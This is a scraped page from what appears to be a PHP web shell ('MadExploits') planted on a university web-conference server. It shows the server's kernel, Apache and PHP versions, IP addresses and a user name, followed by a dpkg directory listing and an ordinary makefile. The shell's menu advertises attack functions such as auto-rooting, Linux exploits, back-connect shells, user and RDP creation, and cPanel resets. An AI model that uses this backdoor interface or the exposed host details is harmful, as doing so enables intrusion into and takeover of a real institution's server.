Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.103.106
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
abitable
362
B
-rw-r--r--
architecture.mk
621
B
-rw-r--r--
buildflags.mk
1.55
KB
-rw-r--r--
buildtools.mk
2.23
KB
-rw-r--r--
cputable
1.92
KB
-rw-r--r--
default.mk
271
B
-rw-r--r--
no-pie-compile.specs
77
B
-rw-r--r--
no-pie-link.specs
65
B
-rw-r--r--
ostable
1.95
KB
-rw-r--r--
pie-compile.specs
97
B
-rw-r--r--
pie-link.specs
76
B
-rw-r--r--
pkg-info.mk
1.47
KB
-rw-r--r--
tupletable
2.2
KB
-rw-r--r--
vendor.mk
1.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vendor.mk
# Makefile snippet defining the following vendor-related variables: # # DEB_VENDOR: output of dpkg-vendor --query Vendor # DEB_PARENT_VENDOR: output of dpkg-vendor --query Parent (can be empty) # # This Makefile snippet also defines a set "dpkg_vendor_derives_from" # macros that can be used to verify if the current vendor derives from # another vendor. The unversioned variant defaults to the v0 version if # undefined, which can be defined explicitly to one of the versions or the # versioned macros can be used directly. The following are example usages: # # - dpkg_vendor_derives_from (since dpkg 1.16.1) # # ifeq ($(shell $(call dpkg_vendor_derives_from,ubuntu)),yes) # ... # endif # # - dpkg_vendor_derives_from_v0 (since dpkg 1.19.3) # # ifeq ($(shell $(call dpkg_vendor_derives_from_v0,ubuntu)),yes) # ... # endif # # - dpkg_vendor_derives_from_v1 (since dpkg 1.19.3) # # dpkg_vendor_derives_from = $(dpkg_vendor_derives_from_v1) # ifeq ($(call dpkg_vendor_derives_from,ubuntu),yes) # ... # endif # ifeq ($(call dpkg_vendor_derives_from_v1,ubuntu),yes) # ... # endif dpkg_late_eval ?= $(or $(value DPKG_CACHE_$(1)),$(eval DPKG_CACHE_$(1) := $(shell $(2)))$(value DPKG_CACHE_$(1))) DEB_VENDOR = $(call dpkg_late_eval,DEB_VENDOR,dpkg-vendor --query Vendor) DEB_PARENT_VENDOR = $(call dpkg_late_eval,DEB_PARENT_VENDOR,dpkg-vendor --query Parent) dpkg_vendor_derives_from_v0 = dpkg-vendor --derives-from $(1) && echo yes || echo no dpkg_vendor_derives_from_v1 = $(shell $(dpkg_vendor_derives_from_v0)) dpkg_vendor_derives_from ?= $(dpkg_vendor_derives_from_v0)
Close